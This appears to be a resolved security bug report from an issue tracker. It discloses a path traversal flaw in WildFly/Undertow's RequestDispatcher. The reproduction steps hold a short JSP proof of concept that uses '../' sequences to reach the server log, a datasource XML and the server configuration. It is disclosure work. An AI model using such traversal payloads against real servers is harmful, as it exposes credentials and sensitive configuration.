-
Type:
Bug
-
Status: Resolved (View Workflow)
-
Priority:
Blocker
-
Resolution: Done
-
Affects Version/s: None
-
Fix Version/s: 1.4.0.Beta1, 1.3.20.Final, 2.0.0.Alpha1
-
Component/s: None
-
Labels:None
-
Environment:
Wildfly 8.2.1.Final, Wildfly 9.0.2.Final, Wildfly 10.0.0.Final
-
Security Sensitive Issue:This issue is security relevant
-
Steps to Reproduce:
We just found the RequestDispatcher forward can access the file outside its deployment context, considering the following example:
In foo.war, foo.jsp:
<%
|
// your are in $WILDFLY_HOME/standalone/tmp/vfs/temp/tempXXX/foo.war-XXX/ |
request.getRequestDispatcher("/../../../../../log/server.log").forward(request, response); // can access the server log |
request.getRequestDispatcher("/../../../../../deployments/foo-ds.xml").forward(request, response); // can assess the sensitive data in data source deployment xml |
request.getRequestDispatcher("/../../../../../configuration/standalone-full.xml").forward(request, response); // can assess server configurations |
// ... can access the whole file system!!! |
%>
|
NOTE: we believed the other method in RequestDispatcher (i.e. .include(...), .error(...)) should contains the same issue.
This issue alreay tested in Wildfly 8.2.1.Final, 9.0.2.Final and 10.0.0.Final, both of them contains this security vulnerability.
Also tested in JBoss AS 7.2.0.Final (i.e. using JBoss Web), do not contains this security vulnerability.
